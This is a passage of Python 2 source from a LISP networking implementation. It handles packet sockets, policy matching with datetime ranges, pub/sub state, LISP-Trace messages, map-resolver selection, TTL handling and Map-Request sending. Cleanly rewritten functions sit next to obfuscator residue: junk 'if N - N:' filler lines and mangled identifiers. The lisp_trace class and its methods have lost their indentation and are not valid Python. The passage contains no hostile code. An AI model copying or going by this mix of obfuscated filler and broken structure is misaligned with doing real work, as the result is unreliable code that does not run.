            sock.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, device)
        except:
            sock.close()
            sock = None
        self.raw_socket = sock

    def set_bridge_socket(self, device):
        """
        Open a PF_PACKET socket bound to 'device' for L2 bridging;
        bridge_socket stays None when the bind fails.

        Bug fix: the original did 'sock = sock.bind(...)' -- bind()
        always returns None, so bridge_socket could never hold a
        usable socket.  The socket object itself is now stored.
        """
        sock = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
        try:
            sock.bind((device, 0))
            self.bridge_socket = sock
        except:
            return
if 30 - 30: O0 / I11i % OoOoOO00 * I1Ii111 / O0 % ooOoO0o
if 36 - 36: iIii1I11I1II1 . iII111i * I1IiiI . I1IiiI - IiII
if 39 - 39: O0 / ooOoO0o + I11i - OoOoOO00 * o0oOOo0O0Ooo - OoO0O00
if 97 - 97: i11iIiiIii / O0 % OoO0O00
class lisp_datetime():
    """
    A configuration datetime of the form "YYYY-MM-DD-HH:MM:SS", kept
    both as the original string (datetime_name) and as the integer
    YYYYMMDDHHMMSS (datetime) for cheap comparisons.
    """

    def __init__(self, datetime_str):
        self.datetime_name = datetime_str
        self.datetime = None
        self.parse_datetime()

    def valid_datetime(self):
        """
        Syntactically validate datetime_name ("YYYY-MM-DD-HH:MM:SS").

        Bug fix: the original range checks used 'and' (e.g.
        month < "01" and month > "12"), a condition that can never be
        true, so out-of-range months/days/hours/minutes/seconds were
        accepted.  The checks now use 'or'.  A malformed time part
        (not exactly HH:MM:SS) now returns False instead of raising.
        """
        dt = self.datetime_name
        if (dt.find(":") == -1): return (False)
        if (dt.find("-") == -1): return (False)
        year, month, day, time_str = dt[0:4], dt[5:7], dt[8:10], dt[11::]

        if ((year + month + day).isdigit() == False): return (False)
        if (month < "01" or month > "12"): return (False)
        if (day < "01" or day > "31"): return (False)

        parts = time_str.split(":")
        if (len(parts) != 3): return (False)
        hour, minute, second = parts

        if ((hour + minute + second).isdigit() == False): return (False)
        if (hour < "00" or hour > "23"): return (False)
        if (minute < "00" or minute > "59"): return (False)
        if (second < "00" or second > "59"): return (False)
        return (True)

    def parse_datetime(self):
        """Store the integer form YYYYMMDDHHMMSS of datetime_name."""
        digits = self.datetime_name
        digits = digits.replace("-", "")
        digits = digits.replace(":", "")
        self.datetime = int(digits)

    def now(self):
        """Return a lisp_datetime for the current wall-clock time."""
        ts = datetime.datetime.now().strftime("%Y-%m-%d-%H:%M:%S")
        return (lisp_datetime(ts))

    def print_datetime(self):
        """Return the original "YYYY-MM-DD-HH:MM:SS" string."""
        return (self.datetime_name)

    def future(self):
        """True when this datetime is strictly later than now."""
        return (self.datetime > self.now().datetime)

    def past(self):
        """True when this datetime is now or earlier."""
        return (self.future() == False)

    def now_in_range(self, upper):
        """True when the current time lies between self and 'upper'."""
        return (self.past() and upper.future())

    def this_year(self):
        """True when this datetime falls in the current year."""
        return (str(self.datetime)[0:4] == str(self.now().datetime)[0:4])

    def this_month(self):
        """True when this datetime falls in the current year+month."""
        return (str(self.datetime)[0:6] == str(self.now().datetime)[0:6])

    def today(self):
        """True when this datetime falls on the current day."""
        return (str(self.datetime)[0:8] == str(self.now().datetime)[0:8])
if 99 - 99: OoooooooOO / II111iiii . I1Ii111
if 62 - 62: OOooOOo . iII111i . I1ii11iIi11i
if 23 - 23: O0
if 33 - 33: ooOoO0o - iII111i % IiII
if 67 - 67: II111iiii
if 66 - 66: iIii1I11I1II1 / OOooOOo
class lisp_policy_match():
    """One match clause of a lisp_policy; a None field is a wildcard."""

    def __init__(self):
        for attr in ("source_eid", "dest_eid", "source_rloc", "dest_rloc",
                     "rloc_record_name", "geo_name", "elp_name", "rle_name",
                     "json_name", "datetime_lower", "datetime_upper"):
            setattr(self, attr, None)
if 65 - 65: IiII . oO0o + O0 - i11iIiiIii + iIii1I11I1II1
if 82 - 82: iIii1I11I1II1 * iII111i + iIii1I11I1II1 / OoO0O00 + O0
class lisp_policy():
    """
    A named policy: match clauses plus "set-*" actions applied to
    matching Map-Requests/Map-Replies.  Saved in global lisp_policies.
    """

    def __init__(self, policy_name):
        self.policy_name = policy_name
        self.match_clauses = []
        self.set_action = None
        self.set_record_ttl = None
        self.set_source_eid = None
        self.set_dest_eid = None
        self.set_rloc_address = None
        self.set_rloc_record_name = None
        self.set_geo_name = None
        self.set_elp_name = None
        self.set_rle_name = None
        self.set_json_name = None

    def match_policy_map_request(self, mr, srloc):
        """
        True when any match clause accepts the Map-Request: source EID,
        target EID and source RLOC fall within the clause's prefixes
        and the current time lies in the clause's datetime range.  A
        None clause field (or None argument) acts as a wildcard.
        """
        for clause in self.match_clauses:
            prefix = clause.source_eid
            addr = mr.source_eid
            if (prefix and addr and
                addr.is_more_specific(prefix) == False):
                continue

            prefix = clause.dest_eid
            addr = mr.target_eid
            if (prefix and addr and
                addr.is_more_specific(prefix) == False):
                continue

            prefix = clause.source_rloc
            addr = srloc
            if (prefix and addr and
                addr.is_more_specific(prefix) == False):
                continue

            lower = clause.datetime_lower
            upper = clause.datetime_upper
            if (lower and upper and
                lower.now_in_range(upper) == False):
                continue
            return (True)

        return (False)

    def set_policy_map_reply(self):
        """
        Build a lisp_rloc carrying this policy's set-* values, or
        return None when no RLOC-affecting set parameter is configured.
        """
        nothing_set = (self.set_rloc_address == None and
            self.set_rloc_record_name == None and self.set_geo_name == None and
            self.set_elp_name == None and self.set_rle_name == None)
        if nothing_set:
            return (None)

        rloc = lisp_rloc()
        if self.set_rloc_address:
            rloc.rloc.copy_address(self.set_rloc_address)
            addr = rloc.rloc.print_address_no_iid()
            lprint("Policy set-rloc-address to {}".format(addr))

        if self.set_rloc_record_name:
            rloc.rloc_name = self.set_rloc_record_name
            name = blue(rloc.rloc_name, False)
            lprint("Policy set-rloc-record-name to {}".format(name))

        # For named references, warn when the name isn't configured.
        if self.set_geo_name:
            rloc.geo_name = self.set_geo_name
            name = rloc.geo_name
            not_found = "" if lisp_geo_list.has_key(name) else "(not configured)"
            lprint("Policy set-geo-name '{}' {}".format(name, not_found))

        if self.set_elp_name:
            rloc.elp_name = self.set_elp_name
            name = rloc.elp_name
            not_found = "" if lisp_elp_list.has_key(name) else "(not configured)"
            lprint("Policy set-elp-name '{}' {}".format(name, not_found))

        if self.set_rle_name:
            rloc.rle_name = self.set_rle_name
            name = rloc.rle_name
            not_found = "" if lisp_rle_list.has_key(name) else "(not configured)"
            lprint("Policy set-rle-name '{}' {}".format(name, not_found))

        if self.set_json_name:
            rloc.json_name = self.set_json_name
            name = rloc.json_name
            not_found = "" if lisp_json_list.has_key(name) else "(not configured)"
            lprint("Policy set-json-name '{}' {}".format(name, not_found))

        return (rloc)

    def save_policy(self):
        """Store this policy in the global lisp_policies table."""
        lisp_policies[self.policy_name] = self
if 34 - 34: I1IiiI % iIii1I11I1II1 . I1ii11iIi11i * Oo0Ooo * iIii1I11I1II1 / O0
if 98 - 98: iII111i % IiII + OoO0O00
if 23 - 23: OOooOOo
class lisp_pubsub():
    """
    Publish/subscribe state for one ITR: who asked for notifies about
    an EID-prefix and how to reach it.  Global store is
    lisp_pubsub_cache: {eid-prefix-string: {xtr-id: lisp_pubsub}}.
    """

    def __init__(self, itr, port, nonce, ttl, xtr_id):
        self.itr = itr
        self.port = port
        self.nonce = nonce
        self.uptime = lisp_get_timestamp()
        self.ttl = ttl
        self.xtr_id = xtr_id
        self.map_notify_count = 0

    def add(self, eid_prefix):
        """Add (or replace) this subscription for eid_prefix."""
        ttl = self.ttl
        prefix = eid_prefix.print_prefix()
        if lisp_pubsub_cache.has_key(prefix) == False:
            lisp_pubsub_cache[prefix] = {}

        subscribers = lisp_pubsub_cache[prefix]

        action = "Add"
        if subscribers.has_key(self.xtr_id):
            action = "Replace"
            del(subscribers[self.xtr_id])

        subscribers[self.xtr_id] = self

        prefix = green(prefix, False)
        itr = red(self.itr.print_address_no_iid(), False)
        xtr_id = "0x" + lisp_hex_string(self.xtr_id)
        lprint("{} pubsub state {} for {}, xtr-id: {}, ttl {}".format(action,
            prefix, itr, xtr_id, ttl))

    def delete(self, eid_prefix):
        """Remove this xtr-id's subscription for eid_prefix, if present."""
        prefix = eid_prefix.print_prefix()
        itr = red(self.itr.print_address_no_iid(), False)
        xtr_id = "0x" + lisp_hex_string(self.xtr_id)
        if lisp_pubsub_cache.has_key(prefix):
            subscribers = lisp_pubsub_cache[prefix]
            if subscribers.has_key(self.xtr_id):
                subscribers.pop(self.xtr_id)
                lprint("Remove pubsub state {} for {}, xtr-id: {}".format(
                    prefix, itr, xtr_id))
if 95 - 95: ooOoO0o
if 95 - 95: Ii1I + i1IIi . I1IiiI % I1Ii111 / Ii1I * O0
if 68 - 68: I1Ii111 - IiII - oO0o - Oo0Ooo - o0oOOo0O0Ooo
if 32 - 32: OoOoOO00 % i11iIiiIii
if 53 - 53: I1Ii111 * Ii1I / IiII . i1IIi * II111iiii / o0oOOo0O0Ooo
if 44 - 44: I1Ii111 + ooOoO0o
if 15 - 15: I11i + OoO0O00 + OoOoOO00
if 100 - 100: I1Ii111
if 78 - 78: OoOoOO00
if 16 - 16: I1Ii111 % OoO0O00 - OoO0O00 % OoOoOO00 * OoO0O00
if 36 - 36: OoOoOO00 * II111iiii . OoooooooOO * I11i . I11i
if 13 - 13: I1ii11iIi11i * II111iiii
if 93 - 93: OOooOOo / O0 - o0oOOo0O0Ooo + OoO0O00 * I1IiiI
if 53 - 53: I1ii11iIi11i
if 91 - 91: o0oOOo0O0Ooo - I1ii11iIi11i . i1IIi
if 64 - 64: ooOoO0o
if 23 - 23: Oo0Ooo . OoO0O00
if 49 - 49: oO0o % i11iIiiIii * Ii1I
if 9 - 9: Oo0Ooo - OoO0O00 + ooOoO0o / o0oOOo0O0Ooo
if 61 - 61: O0 - i11iIiiIii * o0oOOo0O0Ooo
if 92 - 92: Oo0Ooo + OOooOOo - i11iIiiIii
if 26 - 26: O0 % Oo0Ooo + ooOoO0o - Ii1I . Oo0Ooo
class lisp_trace ( ) :
def __init__(self):
    """Start a trace: fresh control nonce, no packet JSON, no socket yet."""
    self.local_rloc = None
    self.local_port = None
    self.lisp_socket = None
    self.packet_json = []
    self.nonce = lisp_get_control_nonce()
if 33 - 33: I1Ii111 / iII111i . I1Ii111 % II111iiii
if 52 - 52: I1ii11iIi11i
def print_trace(self):
    """Log the accumulated LISP-Trace packet JSON."""
    lprint("LISP-Trace JSON: '{}'".format(self.packet_json))
if 100 - 100: OoooooooOO * i1IIi % iII111i + I1ii11iIi11i - iIii1I11I1II1
if 57 - 57: Ii1I % iII111i
def encode(self):
    """
    Build the on-wire LISP-Trace message: a 32-bit type word
    0x90000000 in network byte order, a 32-bit zero placeholder (an
    RTR later stamps local address/port here -- see decode()), the
    64-bit nonce, then the JSON-encoded packet_json list.

    NOTE(review): Python 2 code -- under Python 3 appending the
    json.dumps() str to the struct.pack() bytes would raise TypeError.
    """
    i1IiIiiiii11 = socket.htonl(0x90000000)
    ii1i1II = struct.pack("II", i1IiIiiiii11, 0)
    ii1i1II += struct.pack("Q", self.nonce)
    ii1i1II += json.dumps(self.packet_json)
    return (ii1i1II)
if 69 - 69: I1Ii111 * oO0o * I1IiiI
if 74 - 74: O0 / I11i . Oo0Ooo / I11i % OoO0O00 % o0oOOo0O0Ooo
def decode ( self , packet ) :
o00OooooOOOO = "I"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) < oO0o00O ) : return ( False )
i1IiIiiiii11 = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] ) [ 0 ]
packet = packet [ oO0o00O : : ]
i1IiIiiiii11 = socket . ntohl ( i1IiIiiiii11 )
if ( ( i1IiIiiiii11 & 0xff000000 ) != 0x90000000 ) : return ( False )
if 83 - 83: OoO0O00 - i11iIiiIii + iIii1I11I1II1
if ( len ( packet ) < oO0o00O ) : return ( False )
O0o00o000oO = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] ) [ 0 ]
packet = packet [ oO0o00O : : ]
if 52 - 52: OoooooooOO
O0o00o000oO = socket . ntohl ( O0o00o000oO )
IiIi = O0o00o000oO >> 24
OOOoOOO0 = ( O0o00o000oO >> 16 ) & 0xff
o00iIIiii1iiII1i = ( O0o00o000oO >> 8 ) & 0xff
Ii11Ii1IiiIi = O0o00o000oO & 0xff
self . local_rloc = "{}.{}.{}.{}" . format ( IiIi , OOOoOOO0 , o00iIIiii1iiII1i , Ii11Ii1IiiIi )
self . local_port = str ( i1IiIiiiii11 & 0xffff )
if 89 - 89: iIii1I11I1II1 / O0
o00OooooOOOO = "Q"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) < oO0o00O ) : return ( False )
self . nonce = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] ) [ 0 ]
packet = packet [ oO0o00O : : ]
if ( len ( packet ) == 0 ) : return ( True )
if 64 - 64: OoooooooOO + Ii1I - Ii1I
try :
self . packet_json = json . loads ( packet )
except :
return ( False )
if 67 - 67: II111iiii . Ii1I + I1IiiI
return ( True )
if 77 - 77: O0 % I1ii11iIi11i + i11iIiiIii . OOooOOo % o0oOOo0O0Ooo + OoO0O00
if 31 - 31: ooOoO0o * I1ii11iIi11i
def myeid ( self , eid ) :
return ( lisp_is_myeid ( eid ) )
if 23 - 23: OoOoOO00 - I11i . iIii1I11I1II1
if 87 - 87: OoO0O00 - i11iIiiIii / O0 % OOooOOo % OOooOOo * i1IIi
def return_to_sender ( self , lisp_socket , rts_rloc , packet ) :
OooO0ooO0o0OO , IIi1I1iII111 = self . rtr_cache_nat_trace_find ( rts_rloc )
if ( OooO0ooO0o0OO == None ) :
OooO0ooO0o0OO , IIi1I1iII111 = rts_rloc . split ( ":" )
IIi1I1iII111 = int ( IIi1I1iII111 )
lprint ( "Send LISP-Trace to address {}:{}" . format ( OooO0ooO0o0OO , IIi1I1iII111 ) )
else :
lprint ( "Send LISP-Trace to translated address {}:{}" . format ( OooO0ooO0o0OO ,
IIi1I1iII111 ) )
if 18 - 18: IiII
if 50 - 50: i1IIi / o0oOOo0O0Ooo * OoO0O00
if ( lisp_socket == None ) :
o0 = socket . socket ( socket . AF_INET , socket . SOCK_DGRAM )
o0 . bind ( ( "0.0.0.0" , LISP_TRACE_PORT ) )
o0 . sendto ( packet , ( OooO0ooO0o0OO , IIi1I1iII111 ) )
o0 . close ( )
else :
lisp_socket . sendto ( packet , ( OooO0ooO0o0OO , IIi1I1iII111 ) )
if 98 - 98: I11i . II111iiii
if 13 - 13: oO0o - I11i % II111iiii
if 30 - 30: ooOoO0o / O0 . I11i + I1ii11iIi11i % O0 . I1IiiI
def packet_length ( self ) :
O0OO0ooO00 = 8 ; iIi111I1 = 4 + 4 + 8
return ( O0OO0ooO00 + iIi111I1 + len ( json . dumps ( self . packet_json ) ) )
if 98 - 98: o0oOOo0O0Ooo % O0 - i11iIiiIii
if 49 - 49: o0oOOo0O0Ooo / OoOoOO00 + iII111i
def rtr_cache_nat_trace ( self , translated_rloc , translated_port ) :
iII1 = self . local_rloc + ":" + self . local_port
Oooo0oOOO0 = ( translated_rloc , translated_port )
lisp_rtr_nat_trace_cache [ iII1 ] = Oooo0oOOO0
lprint ( "Cache NAT Trace addresses {} -> {}" . format ( iII1 , Oooo0oOOO0 ) )
if 85 - 85: I1IiiI - o0oOOo0O0Ooo
if 86 - 86: II111iiii + Ii1I * Ii1I
def rtr_cache_nat_trace_find ( self , local_rloc_and_port ) :
iII1 = local_rloc_and_port
try : Oooo0oOOO0 = lisp_rtr_nat_trace_cache [ iII1 ]
except : Oooo0oOOO0 = ( None , None )
return ( Oooo0oOOO0 )
if 26 - 26: o0oOOo0O0Ooo + oO0o * i11iIiiIii / II111iiii
if 86 - 86: Ii1I
if 69 - 69: oO0o % o0oOOo0O0Ooo / o0oOOo0O0Ooo
if 1 - 1: Ii1I
if 43 - 43: o0oOOo0O0Ooo
if 78 - 78: I1Ii111 % i1IIi * I11i
if 59 - 59: OoOoOO00 % OoO0O00 % i11iIiiIii . II111iiii % I1ii11iIi11i + i1IIi
if 99 - 99: I11i + IiII * I1Ii111 - OOooOOo - i1IIi
if 77 - 77: I11i . IiII / OoO0O00 / I1Ii111
if 8 - 8: o0oOOo0O0Ooo + iII111i / OoO0O00 * ooOoO0o - oO0o . iII111i
if 32 - 32: OoooooooOO . I1Ii111 - I1ii11iIi11i
def lisp_get_map_server(address):
    """
    Return the configured map-server whose address is an exact match
    for 'address', or None when no map-server matches.
    """
    for ms in lisp_map_servers_list.values():
        if (ms.map_server.is_exact_match(address)): return(ms)
    return(None)
if 33 - 33: I1ii11iIi11i - O0
if 72 - 72: Oo0Ooo * iII111i - I11i
if 81 - 81: I1Ii111
if 85 - 85: O0 % OoOoOO00 . I1ii11iIi11i
if 46 - 46: OOooOOo * iIii1I11I1II1
if 33 - 33: OoO0O00 * II111iiii / i1IIi
if 93 - 93: I1Ii111 % I11i
def lisp_get_any_map_server():
    """Return an arbitrary configured map-server, or None when none exist."""
    for ms in lisp_map_servers_list.values(): return(ms)
    return(None)
if 64 - 64: I1IiiI % OoOoOO00 / Oo0Ooo
if 40 - 40: Ii1I + iIii1I11I1II1 / oO0o . II111iiii % O0 - IiII
if 49 - 49: IiII - OOooOOo * OOooOOo . O0
if 60 - 60: OoOoOO00 % iIii1I11I1II1 + IiII % o0oOOo0O0Ooo
if 64 - 64: OoOoOO00 * I1ii11iIi11i . OoooooooOO . i1IIi
if 61 - 61: OoO0O00
if 100 - 100: OoOoOO00
if 97 - 97: OoooooooOO
if 91 - 91: o0oOOo0O0Ooo / O0 % OoO0O00
if 35 - 35: iII111i % OoO0O00 * O0
def lisp_get_map_resolver(address, eid):
    """
    Select a map-resolver. When 'address' is supplied, return the
    resolver whose table key contains that address string (the last
    such match). Otherwise choose by EID: "" matches any resolver,
    None selects mr-name "all", and a real EID uses the mr-name from
    its database-mapping. Among candidates the least recently used
    resolver is returned.
    """
    if (address != None):
        addr_str = address.print_address()
        mr = None
        for key in lisp_map_resolvers_list:
            if (key.find(addr_str) == -1): continue
            mr = lisp_map_resolvers_list[key]
        return(mr)

    #
    # Map the EID argument onto an mr-name to search for.
    #
    if (eid == ""):
        mr_name = ""
    elif (eid == None):
        mr_name = "all"
    else:
        db = lisp_db_for_lookups.lookup_cache(eid, False)
        mr_name = "all" if db == None else db.use_mr_name

    #
    # Pick the least-recently-used resolver with a matching mr-name.
    #
    oldest = None
    for mr in lisp_map_resolvers_list.values():
        if (mr_name == ""): return(mr)
        if (mr.mr_name != mr_name): continue
        if (oldest == None or mr.last_used < oldest.last_used): oldest = mr
    return(oldest)
if 100 - 100: O0 * iIii1I11I1II1 - OoooooooOO
if 41 - 41: OoO0O00 / OoooooooOO
if 61 - 61: ooOoO0o
if 4 - 4: Oo0Ooo + oO0o + oO0o
if 79 - 79: OoooooooOO
if 98 - 98: O0 . ooOoO0o * I1Ii111
if 98 - 98: ooOoO0o + o0oOOo0O0Ooo / I11i - Ii1I * II111iiii + i1IIi
if 10 - 10: oO0o
def lisp_get_decent_map_resolver(eid):
    """
    LISP-Decent resolver selection: hash the EID into an index and use
    the resolver named "<index>.<lisp_decent_dns_suffix>", returning
    the least recently used resolver carrying that DNS name (or None).
    """
    index = lisp_get_decent_index(eid)
    dns_name = str(index) + "." + lisp_decent_dns_suffix

    lprint("Use LISP-Decent map-resolver {} for EID {}".format(
        bold(dns_name, False), eid.print_prefix()))

    oldest = None
    for mr in lisp_map_resolvers_list.values():
        if (dns_name != mr.dns_name): continue
        if (oldest == None or mr.last_used < oldest.last_used): oldest = mr
    return(oldest)
if 20 - 20: o0oOOo0O0Ooo . I1Ii111 + O0
if 99 - 99: O0 / IiII . oO0o
if 18 - 18: OoooooooOO * OoO0O00 * I1Ii111
if 12 - 12: i11iIiiIii / iIii1I11I1II1 . I11i % I1Ii111 * ooOoO0o % ooOoO0o
if 13 - 13: i1IIi . ooOoO0o . ooOoO0o
if 24 - 24: iIii1I11I1II1
if 72 - 72: i11iIiiIii + o0oOOo0O0Ooo % ooOoO0o * I1ii11iIi11i . i1IIi
def lisp_ipv4_input(packet):
    """
    Sanity-check a received IPv4 header (raw string) and decrement its
    TTL. Returns a 2-element list: [True, packet] for protocol-2 (IGMP)
    packets, which the caller handles specially; [False, None] when the
    packet must be discarded (bad checksum, ttl 0, ttl expiry); else
    [False, packet] with TTL decremented and the checksum recomputed.
    """

    #
    # Protocol 2 (IGMP) passes through untouched.
    #
    if (ord(packet[9]) == 2): return([True, packet])

    #
    # Verify the header checksum; an all-zeros checksum is tolerated
    # with a warning.
    #
    checksum = struct.unpack("H", packet[10:12])[0]
    if (checksum == 0):
        dprint("Packet arrived with checksum of 0!")
    else:
        packet = lisp_ip_checksum(packet)
        checksum = struct.unpack("H", packet[10:12])[0]
        if (checksum != 0):
            dprint("IPv4 header checksum failed for inner header")
            packet = lisp_format_packet(packet[0:20])
            dprint("Packet header: {}".format(packet))
            return([False, None])

    #
    # Discard ttl 0 and ttl-expiring packets.
    #
    ttl = struct.unpack("B", packet[8:9])[0]
    if (ttl == 0):
        dprint("IPv4 packet arrived with ttl 0, packet discarded")
        return([False, None])
    elif (ttl == 1):
        dprint("IPv4 packet {}, packet discarded".format(bold("ttl expiry",
            False)))
        return([False, None])

    #
    # Decrement TTL, zero the checksum field, and recompute it.
    #
    ttl -= 1
    packet = packet[0:8] + struct.pack("B", ttl) + packet[9::]
    packet = packet[0:10] + struct.pack("H", 0) + packet[12::]
    packet = lisp_ip_checksum(packet)
    return([False, packet])
if 91 - 91: Oo0Ooo . I11i . I1ii11iIi11i
if 60 - 60: i11iIiiIii - OOooOOo
if 78 - 78: I1IiiI * ooOoO0o % iIii1I11I1II1 / I1ii11iIi11i
if 61 - 61: I1Ii111 . Ii1I + OoooooooOO
if 98 - 98: OOooOOo . ooOoO0o . OoOoOO00 - I1Ii111 . i1IIi - iIii1I11I1II1
if 89 - 89: II111iiii * I1ii11iIi11i - I1IiiI
if 58 - 58: Ii1I / Oo0Ooo % IiII
def lisp_ipv6_input(packet):
    """
    Pre-process a received IPv6 packet (a lisp_packet). Returns the raw
    packet string with the hop-limit decremented, or None when the
    packet must be discarded (hop-limit 0/1 or link-local destination).
    """
    dest = packet.inner_dest
    packet = packet.packet

    #
    # Check the hop-limit (byte 7) before touching it.
    #
    hop_limit = struct.unpack("B", packet[7:8])[0]
    if (hop_limit == 0):
        dprint("IPv6 packet arrived with hop-limit 0, packet discarded")
        return(None)
    elif (hop_limit == 1):
        dprint("IPv6 packet {}, packet discarded".format(bold("ttl expiry",
            False)))
        return(None)

    #
    # Never encapsulate link-local traffic.
    #
    if (dest.is_ipv6_link_local()):
        dprint("Do not encapsulate IPv6 link-local packets")
        return(None)

    hop_limit -= 1
    packet = packet[0:7] + struct.pack("B", hop_limit) + packet[8::]
    return(packet)
if 75 - 75: O0 % Ii1I
if 47 - 47: OoooooooOO - OoooooooOO + OoO0O00 / iIii1I11I1II1
if 23 - 23: iII111i / iIii1I11I1II1
if 5 - 5: O0
if 64 - 64: i1IIi * i1IIi . iII111i - O0 - oO0o % OoooooooOO
if 14 - 14: Ii1I % OoO0O00 % I1Ii111 * O0
if 8 - 8: I1IiiI - i11iIiiIii * I1IiiI
if 6 - 6: O0 - OoOoOO00 - i11iIiiIii / iII111i
def lisp_mac_input(packet):
    """MAC frames need no input pre-processing; return the frame as-is."""
    return(packet)
if 63 - 63: OOooOOo
if 84 - 84: i11iIiiIii * iIii1I11I1II1 % I11i % iII111i + OoooooooOO . o0oOOo0O0Ooo
if 78 - 78: o0oOOo0O0Ooo . iII111i + O0 / I1ii11iIi11i + I1ii11iIi11i + II111iiii
if 96 - 96: iIii1I11I1II1 * II111iiii . iIii1I11I1II1
if 13 - 13: Ii1I - OoOoOO00 . Ii1I
if 7 - 7: Ii1I - I11i / I1ii11iIi11i + iII111i
if 47 - 47: I11i * IiII / oO0o - OoooooooOO . OoooooooOO / I11i
if 73 - 73: Ii1I . IiII % IiII
if 56 - 56: I1Ii111 + iII111i + iII111i
def lisp_rate_limit_map_request(source, dest):
    """
    Return True when a Map-Request for source -> dest should be
    suppressed because the previous one went out less than
    LISP_MAP_REQUEST_RATE_LIMIT seconds ago.
    """
    if (lisp_last_map_request_sent == None): return(False)
    now = lisp_get_timestamp()
    elapsed = now - lisp_last_map_request_sent
    rate_limit = (elapsed < LISP_MAP_REQUEST_RATE_LIMIT)

    if (rate_limit):
        if (source != None): source = source.print_address()
        dest = dest.print_address()
        dprint("Rate-limiting Map-Request for {} -> {}".format(source, dest))
    return(rate_limit)
if 40 - 40: o0oOOo0O0Ooo
if 33 - 33: i11iIiiIii + I1Ii111 % I1ii11iIi11i - I1Ii111 * OoO0O00
if 1 - 1: II111iiii / I1IiiI + II111iiii % II111iiii - I1Ii111
if 24 - 24: I11i / Oo0Ooo / i1IIi + IiII
if 10 - 10: I11i - IiII / II111iiii / oO0o % O0 / I1Ii111
if 91 - 91: oO0o * OoOoOO00 + O0 % Oo0Ooo
if 62 - 62: iIii1I11I1II1 - i11iIiiIii % iIii1I11I1II1 . ooOoO0o / OOooOOo * OoOoOO00
def lisp_send_map_request(lisp_sockets, lisp_ephem_port, seid, deid, rloc):
    """
    Build and send a Map-Request for 'deid' (sourced from 'seid' when
    supplied). A non-None 'rloc' makes this an RLOC-probe sent directly
    to that locator (encapsulated when the target sits behind a NAT);
    otherwise the request goes to a map-resolver inside an ECM. Updates
    the module-level rate-limit timestamp on the resolver path.
    """
    global lisp_last_map_request_sent

    #
    # When probing, address the probe to the RLOC itself. An RTR probes
    # the translated port; otherwise the standard data port is used.
    #
    probe_dest = probe_port = None
    if (rloc):
        probe_dest = rloc.rloc
        probe_port = rloc.translated_port if lisp_i_am_rtr else LISP_DATA_PORT
    #endif

    #
    # We need local RLOCs for the ITR-RLOCs field.
    #
    itr_rloc4, itr_rloc6, device = lisp_myrlocs
    if (itr_rloc4 == None):
        lprint("Suppress sending Map-Request, IPv4 RLOC not found")
        return
    #endif
    if (itr_rloc6 == None and probe_dest != None and probe_dest.is_ipv6()):
        lprint("Suppress sending Map-Request, IPv6 RLOC not found")
        return
    #endif

    map_request = lisp_map_request()
    map_request.record_count = 1
    map_request.nonce = lisp_get_control_nonce()
    map_request.rloc_probe = (probe_dest != None)

    #
    # Remember the probe nonce so the matching Map-Reply can be paired
    # with this RLOC.
    #
    if (rloc): rloc.last_rloc_probe_nonce = map_request.nonce

    #
    # For a multicast EID, the (S,G) goes in target-eid/target-group.
    #
    multicast = deid.is_multicast_address()
    if (multicast):
        map_request.target_eid = seid
        map_request.target_group = deid
    else:
        map_request.target_eid = deid
    #endif

    #
    # Sign non-probe Map-Requests when a signature-eid database-mapping
    # is configured.
    #
    if (map_request.rloc_probe == False):
        db = lisp_get_signature_eid()
        if (db):
            map_request.signature_eid.copy_address(db.eid)
            map_request.privkey_filename = "./lisp-sig.pem"
        #endif
    #endif

    if (seid == None or multicast):
        map_request.source_eid.afi = LISP_AFI_NONE
    else:
        map_request.source_eid = seid
    #endif

    #
    # NAT case (non-RTR): probes to public RLOCs must carry our
    # translated RLOC so the reply can reach us.
    #
    if (probe_dest != None and lisp_nat_traversal and lisp_i_am_rtr == False):
        if (probe_dest.is_private_address() == False):
            itr_rloc4 = lisp_get_any_translated_rloc()
        #endif
        if (itr_rloc4 == None):
            lprint("Suppress sending Map-Request, translated RLOC not found")
            return
        #endif
    #endif

    #
    # Fill in the ITR-RLOCs. For IPv4, prefer the NAT-translated
    # address when one exists and this is not a probe.
    #
    if (probe_dest == None or probe_dest.is_ipv4()):
        if (lisp_nat_traversal and probe_dest == None):
            translated = lisp_get_any_translated_rloc()
            if (translated != None): itr_rloc4 = translated
        #endif
        map_request.itr_rlocs.append(itr_rloc4)
    #endif
    if (probe_dest == None or probe_dest.is_ipv6()):
        if (itr_rloc6 == None or itr_rloc6.is_ipv6_link_local()):
            itr_rloc6 = None
        else:
            map_request.itr_rloc_count = 1 if (probe_dest == None) else 0
            map_request.itr_rlocs.append(itr_rloc6)
        #endif
    #endif

    #
    # Choose the address used as the inner source below.
    #
    if (probe_dest != None and map_request.itr_rlocs != []):
        itr_rloc = map_request.itr_rlocs[0]
    else:
        if (deid.is_ipv4()):
            itr_rloc = itr_rloc4
        elif (deid.is_ipv6()):
            itr_rloc = itr_rloc6
        else:
            itr_rloc = itr_rloc4
        #endif
    #endif

    packet = map_request.encode(probe_dest, probe_port)
    map_request.print_map_request()

    #
    # RLOC-probes go directly to the RLOC. A probe to an xTR behind a
    # NAT is handed to lisp_encapsulate_rloc_probe() so it traverses
    # the NAT.
    #
    if (probe_dest != None):
        if (rloc.is_rloc_translated()):
            nat_info = lisp_get_nat_info(probe_dest, rloc.rloc_name)

            #
            # Gleaned mappings have no info-source state; synthesize a
            # lisp_nat_info from the RLOC itself.
            #
            if (nat_info == None):
                addr_str = rloc.rloc.print_address_no_iid()
                hostname = "gleaned-{}".format(addr_str)
                port = rloc.translated_port
                nat_info = lisp_nat_info(addr_str, hostname, port)
            #endif
            lisp_encapsulate_rloc_probe(lisp_sockets, probe_dest, nat_info,
                packet)
            return
        #endif

        addr_str = probe_dest.print_address_no_iid()
        dest = lisp_convert_4to6(addr_str)
        lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
        return
    #endif

    #
    # Pick a map-resolver: LISP-Decent hashes the dest-EID onto a
    # resolver, otherwise use the one configured for this source-EID
    # (an RTR always passes None, i.e. the "all" set).
    #
    lookup_seid = None if lisp_i_am_rtr else seid
    if (lisp_decent_pull_xtr_configured()):
        mr = lisp_get_decent_map_resolver(deid)
    else:
        mr = lisp_get_map_resolver(None, lookup_seid)
    #endif
    if (mr == None):
        lprint("Cannot find Map-Resolver for source-EID {}".format(
